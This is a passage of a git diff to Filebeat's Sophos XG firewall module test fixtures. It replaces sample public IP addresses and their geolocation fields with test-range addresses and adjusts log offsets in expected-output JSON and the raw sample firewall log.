@@ -332,7 +323,7 @@
 "host.name": "my_fancy_host",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 2802,
+ "log.offset": 2803,
 "message": "User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123456",
@@ -342,7 +333,7 @@
 "my_fancy_host"
 ],
 "related.ip": [
- "217.250.157.135"
+ "81.2.69.145"
 ],
 "related.user": [
 "elastic.user@elastic.test.com"
@@ -357,17 +348,15 @@
 "sophos.xg.message_id": "17710",
 "sophos.xg.priority": "Information",
 "sophos.xg.status": "Successful",
- "source.as.number": 3320,
- "source.as.organization.name": "Deutsche Telekom AG",
- "source.geo.city_name": "Schleidweiler",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "DE",
- "source.geo.country_name": "Germany",
- "source.geo.location.lat": 49.8808,
- "source.geo.location.lon": 6.6593,
- "source.geo.region_iso_code": "DE-RP",
- "source.geo.region_name": "Rheinland-Pfalz",
- "source.ip": "217.250.157.135",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.145",
 "source.user.name": "elastic.user@elastic.test.com",
 "tags": [
 "forwarded",
@@ -390,7 +379,7 @@
 "host.name": "my_fancy_host",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 3333,
+ "log.offset": 3330,
 "message": "SSL VPN User 'elastic.user@elastic.test.com' connected ",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123456",
@@ -426,7 +415,7 @@
 },
 {
 "@timestamp": "2020-05-18T14:39:05.000-02:00",
- "client.ip": "91.67.201.4",
+ "client.ip": "1.128.3.4",
 "event.category": [
 "authentication"
 ],
@@ -434,7 +423,7 @@
 "event.dataset": "sophos.xg",
 "event.kind": "event",
 "event.module": "sophos",
- "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:05 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063010517708 log_type=\"Event\" log_component=\"VPN Authentication\" log_subtype=\"Authentication\" status=\"Failed\" priority=Notice user_name=\"hendrikl\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD,AD,Local\" reason=\"wrong credentials\" src_ip=91.67.201.4 message=\"User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials\" name=\"\" src_mac=",
+ "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:05 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063010517708 log_type=\"Event\" log_component=\"VPN Authentication\" log_subtype=\"Authentication\" status=\"Failed\" priority=Notice user_name=\"hendrikl\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD,AD,Local\" reason=\"wrong credentials\" src_ip=1.128.3.4 message=\"User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials\" name=\"\" src_mac=",
 "event.outcome": "failure",
 "event.severity": "5",
 "event.timezone": "-02:00",
@@ -442,7 +431,7 @@
 "host.name": "my_fancy_host",
 "input.type": "log",
 "log.level": "notification",
- "log.offset": 3832,
+ "log.offset": 3829,
 "message": "User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123456",
@@ -452,7 +441,7 @@
 "my_fancy_host"
 ],
 "related.ip": [
- "91.67.201.4"
+ "1.128.3.4"
 ],
 "related.user": [
 "hendrikl"
@@ -468,17 +457,9 @@
 "sophos.xg.priority": "Notice",
 "sophos.xg.reason": "wrong credentials",
 "sophos.xg.status": "Failed",
- "source.as.number": 31334,
- "source.as.organization.name": "Vodafone Kabel Deutschland GmbH",
- "source.geo.city_name": "Fell",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "DE",
- "source.geo.country_name": "Germany",
- "source.geo.location.lat": 49.7667,
- "source.geo.location.lon": 6.7833,
- "source.geo.region_iso_code": "DE-RP",
- "source.geo.region_name": "Rheinland-Pfalz",
- "source.ip": "91.67.201.4",
+ "source.as.number": 1221,
+ "source.as.organization.name": "Telstra Pty Ltd",
+ "source.ip": "1.128.3.4",
 "source.user.name": "hendrikl",
 "tags": [
 "forwarded",
@@ -499,7 +480,7 @@
 "host.name": "my_fancy_host",
 "input.type": "log",
 "log.level": "notification",
- "log.offset": 4346,
+ "log.offset": 4341,
 "message": "ATP definitions upgraded from 1.0.0297 to 1.0.0298.",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123456",
@@ -538,7 +519,7 @@
 "host.name": "some_other_host.local",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 4674,
+ "log.offset": 4669,
 "message": "SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123457",
@@ -572,12 +553,12 @@
 },
 {
 "@timestamp": "2020-05-18T14:39:08.000-02:00",
- "client.ip": "172.66.35.15",
+ "client.ip": "175.16.199.1",
 "event.code": "062109517507",
 "event.dataset": "sophos.xg",
 "event.kind": "event",
 "event.module": "sophos",
- "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:08 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062109517507 log_type=\"Event\" log_component=\"CLI\" log_subtype=\"Admin\" status=\"Failed\" priority=Notice user_name=\"root\" src_ip=172.66.35.15 message=\"User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials\"",
+ "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:08 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062109517507 log_type=\"Event\" log_component=\"CLI\" log_subtype=\"Admin\" status=\"Failed\" priority=Notice user_name=\"root\" src_ip=175.16.199.1 message=\"User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials\"",
 "event.outcome": "failure",
 "event.severity": "5",
 "event.timezone": "-02:00",
@@ -585,8 +566,8 @@
 "host.name": "my_fancy_host",
 "input.type": "log",
 "log.level": "notification",
- "log.offset": 5069,
- "message": "User 'root' failed to login from '172.66.35.15' using ssh because of wrong credentials",
+ "log.offset": 5064,
+ "message": "User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123456",
 "observer.type": "firewall",
@@ -595,7 +576,7 @@
 "my_fancy_host"
 ],
 "related.ip": [
- "172.66.35.15"
+ "175.16.199.1"
 ],
 "related.user": [
 "root"
@@ -609,12 +590,15 @@
 "sophos.xg.message_id": "17507",
 "sophos.xg.priority": "Notice",
 "sophos.xg.status": "Failed",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "172.66.35.15",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "source.user.name": "root",
 "tags": [
 "forwarded",
@@ -634,7 +618,7 @@
 "host.name": "my_fancy_host",
 "input.type": "log",
 "log.level": "notification",
- "log.offset": 5423,
+ "log.offset": 5418,
 "message": "IPS definitions upgraded from 9.17.09 to 9.17.10.",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123456",
@@ -672,7 +656,7 @@
 "host.name": "my_fancy_host",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 5747,
+ "log.offset": 5742,
 "message": "Scheduled backup to appliance is successful.",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123456",
@@ -721,7 +705,7 @@
 "host.name": "some_other_host.local",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 6045,
+ "log.offset": 6040,
 "message": "User elastic.user@elastic.test.com was logged out of firewall",
 "observer.product": "XG",
 "observer.serial_number": "1234567890123457",
@@ -777,7 +761,7 @@
 "host.name": "firewall.localgroup.local",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 6643,
+ "log.offset": 6638,
 "message": "A350196C47072B0/Gaurav Patel is now re-connected after 164000 ms",
 "observer.product": "XG",
 "observer.serial_number": "S1601E1F9FCB7EE",
@@ -791,7 +775,7 @@
 "sophos.xg.branch_name": "Gaurav Patel",
 "sophos.xg.device": "SFW",
 "sophos.xg.device_name": "XG125w",
- "sophos.xg.eventtime": "2017-03-16T12:56:01.000+02:00",
+ "sophos.xg.eventtime": "2017-03-16T08:56:01.000-02:00",
 "sophos.xg.log_component": "RED",
 "sophos.xg.log_subtype": "System",
 "sophos.xg.log_type": "Event",
@@ -823,7 +807,7 @@
 "host.name": "firewall.localgroup.local",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 7072,
+ "log.offset": 7067,
 "message": "A350196C47072B0/Gaurav Patel is now disconnected",
 "observer.product": "XG",
 "observer.serial_number": "S1601E1F9FCB7EE",
@@ -837,7 +821,7 @@
 "sophos.xg.branch_name": "Gaurav Patel",
 "sophos.xg.device": "SFW",
 "sophos.xg.device_name": "XG125w",
- "sophos.xg.eventtime": "2017-03-16T12:53:27.000+02:00",
+ "sophos.xg.eventtime": "2017-03-16T08:53:27.000-02:00",
 "sophos.xg.log_component": "RED",
 "sophos.xg.log_subtype": "System",
 "sophos.xg.log_type": "Event",
@@ -869,7 +853,7 @@
 "host.name": "firewall.localgroup.local",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 7491,
+ "log.offset": 7486,
 "message": "A350196C47072B0/NY transfered bytes TX: 0 RX: 0",
 "observer.product": "XG",
 "observer.serial_number": "S1601E1F9FCB7EE",
@@ -883,7 +867,7 @@
 "sophos.xg.branch_name": "NY",
 "sophos.xg.device": "SFW",
 "sophos.xg.device_name": "XG125w",
- "sophos.xg.eventtime": "2017-03-16T12:46:26.000+02:00",
+ "sophos.xg.eventtime": "2017-03-16T08:46:26.000-02:00",
 "sophos.xg.log_component": "RED",
 "sophos.xg.log_subtype": "System",
 "sophos.xg.log_type": "Event",
@@ -910,7 +894,7 @@
 "host.name": "firewall.localgroup.local",
 "input.type": "log",
 "log.level": "notification",
- "log.offset": 7886,
+ "log.offset": 7881,
 "message": "DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86.",
 "observer.product": "XG",
 "observer.serial_number": "S4000806149EE49",
diff --git a/x-pack/filebeat/module/sophos/xg/test/firewall.log b/x-pack/filebeat/module/sophos/xg/test/firewall.log
index 5308affaf8e7..920661cc9c28 100644
--- a/x-pack/filebeat/module/sophos/xg/test/firewall.log
+++ b/x-pack/filebeat/module/sophos/xg/test/firewall.log
@@ -1,20 +1,20 @@ -<30>device="SFW" date=2020-05-18 time=14:38:37 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="HTTP" application_risk=1 application_technology="Browser Based" application_category="General Internet" in_interface="Port1" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=172.17.34.15 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol="TCP" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="LAN" srczone="LAN" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Stop" connid="1617925280" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:38 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=15 appfilter_policy_id=0 application="DNS" application_risk=1 application_technology="Network Protocol" application_category="Infrastructure" in_interface="Port3.400" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=172.16.66.155 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol="UDP" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="DMZ" srczone="DMZ" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Start" connid="3360392048" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 
+<30>device="SFW" date=2020-05-18 time=14:38:37 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="HTTP" application_risk=1 application_technology="Browser Based" application_category="General Internet" in_interface="Port1" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=1.128.3.4 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol="TCP" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="LAN" srczone="LAN" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Stop" connid="1617925280" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:38 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=15 appfilter_policy_id=0 application="DNS" application_risk=1 application_technology="Network Protocol" application_category="Infrastructure" in_interface="Port3.400" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=67.43.156.12 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol="UDP" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="DMZ" srczone="DMZ" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Start" connid="3360392048" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" 
date=2020-05-18 time=14:38:39 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.113 src_country_code="" dst_ip=172.20.4.52 dst_country_code="" protocol="TCP" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:40 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="tun0" out_interface="Port1" src_mac="" src_ip=10.82.234.6 src_country_code="" dst_ip=192.168.0.1 dst_country_code="" protocol="TCP" src_port=60102 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:41 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" 
status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2" out_interface="" src_mac=c4:f7:d5:b5:47:f4 src_ip=51.77.56.9 src_country_code="" dst_ip=185.7.209.207 dst_country_code="" protocol="TCP" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:41 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2" out_interface="" src_mac=c4:f7:d5:b5:47:f4 src_ip=67.43.156.12 src_country_code="" dst_ip=185.7.209.207 dst_country_code="" protocol="TCP" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:42 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 
application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.101 src_country_code="" dst_ip=192.168.5.11 dst_country_code="" protocol="TCP" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:43 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=172.16.36.105 src_country_code="" dst_ip=10.84.234.14 dst_country_code="" protocol="UDP" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:44 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=012802605201 log_type="Firewall" log_component="SSL VPN" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="tun0" out_interface="" src_mac="" src_ip=10.82.234.9 src_country_code="" dst_ip=10.82.234.11 dst_country_code="" protocol="TCP" src_port=58331 dst_port=56267 
sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name="elastic@user.local" user_gp="elastic.group.local" iap=0 ips_policy_id=11 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=172.16.34.50 dst_country_code=R1 protocol="TCP" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="VPN" srczone="VPN" dstzonetype="VPN" dstzone="VPN" dir_disp="" connevent="Start" connid="1615935064" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=018201500005 log_type="Firewall" log_component="ICMP ERROR MESSAGE" log_subtype="Allowed" status="Allow" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code="" dst_ip=172.17.32.19 dst_country_code="" protocol="ICMP" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" 
dstzonetype="" dstzone="" dir_disp="" connevent="Interim" connid="2685668438" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-06-05 time=12:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port1" src_mac=00:00:00:00:00:00 src_ip=172.17.35.119 src_country_code=R1 dst_ip=172.16.34.10 dst_country_code=R1 protocol="TCP" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype="VPN" srczone="VPN" dstzonetype="LAN" dstzone="LAN" dir_disp="" connevent="Stop" connid="1617126256" vconnid="" hb_health="NoHeartbeat" message="" appresolvedby="Signature" app_is_cloud=0" -<30>device="SFW" date=2018-05-30 time=13:26:37 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010202601001 log_type="Firewall" log_component="Invalid Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol="UDP" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="Invalid UDP destination." 
appresolvedby=" Signature" +<30>device="SFW" date=2018-05-30 time=13:26:37 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010202601001 log_type="Firewall" log_component="Invalid Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="UDP" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="Invalid UDP destination." appresolvedby=" Signature" <30>device="SFW" date=2018-06-04 time=17:20:24 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=011402601301 log_type="Firewall" log_component="Fragmented Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=0.0.0.0 src_country_code= dst_ip=0.0.0.0 dst_country_code= protocol="0" src_port=0 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=14:01:32 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=2 policy_type=0 
user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2.611" out_interface="" src_mac=c8:5b:76:ab:72:d3 src_ip=10.198.38.184 src_country_code= dst_ip=10.198.39.255 dst_country_code= protocol="UDP" src_port=137 dst_port=137 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=14:17:17 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=b8:97:5a:5b:0f:fd src_ip=10.198.32.19 src_country_code= dst_ip=10.198.32.48 dst_country_code= protocol="TCP" src_port=41960 dst_port=22 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby=" Signature" <30>device="SFW" date=2018-06-05 time=14:30:31 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010502604001 log_type="Firewall" log_component="ICMP Redirection" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.37.23 src_country_code= dst_ip=10.198.36.48 dst_country_code= 
protocol="ICMP" icmp_type=5 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby=" Signature" -<30>device="SFW" date=2018-05-31 time=17:05:14 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010602605001 log_type="Firewall" log_component="Source Routed" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol="TCP" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" +<30>device="SFW" date=2018-05-31 time=17:05:14 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010602605001 log_type="Firewall" log_component="Source Routed" 